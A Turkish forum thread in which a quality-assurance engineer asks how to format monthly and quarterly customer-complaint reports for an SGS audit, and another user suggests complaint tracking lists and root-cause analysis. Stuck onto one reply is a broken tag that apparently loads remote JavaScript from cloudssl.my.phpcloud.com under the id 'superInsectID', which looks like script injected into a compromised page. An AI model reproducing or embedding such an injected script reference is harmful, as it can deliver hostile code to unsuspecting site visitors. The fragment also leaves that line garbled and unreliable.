Müşteri Şikayetleri Analizi

0

Arkadaşlar merhaba bir firmada kalite güvence mühendisi olarak çalışıyorum Ağustos ayında denetimimiz var SGS den ara denetim olucak. Benden müşteri şikayetlerini aylık ve 3 aylık olarak raporlamam analiz etmem istendi. Sizce hangi formatta hazırlamalıyım yada elinizde format örnekleri varsa bana iletirmisiniz.
KONUYA YAPILAN EK ve YORUM

Orjinalini yazan: ebru kibar ebru kibar yazdi:

merhaba, müşteri şikayetlerinde kullanılan form dışında bir de müşteri şikayetlerini izlediğiniz genel bir form olmalı tıpkı döflerin takibi gibi burada liste halinde hepsini görebilirsiniz. analiz kısmına gelince şikayetlerin konularına göre analiz yapılabilir şikayetin asıl nedeni mesela üretim veya kalite kontrol kaynaklı gibi bunun sonucunda da yüksek çıkan sonuçlarda ne gibi çalışma yaptınız diye soracaklardır.

verdiğiniz bilgiler için teşekkür ederim. Elinizde hazır bir format var mı peki konu ile ilgili?

KONUYA YAPILAN EK ve YORUM

Orjinalini yazan: ebru kibar ebru kibar yazdi:

rica ederim. mail adresinizi atın göndereyim.

mailimi mesaj olarak ilettim teşekkürler< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
KONUYA YAPILAN EK ve YORUM

Share.

Leave A Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.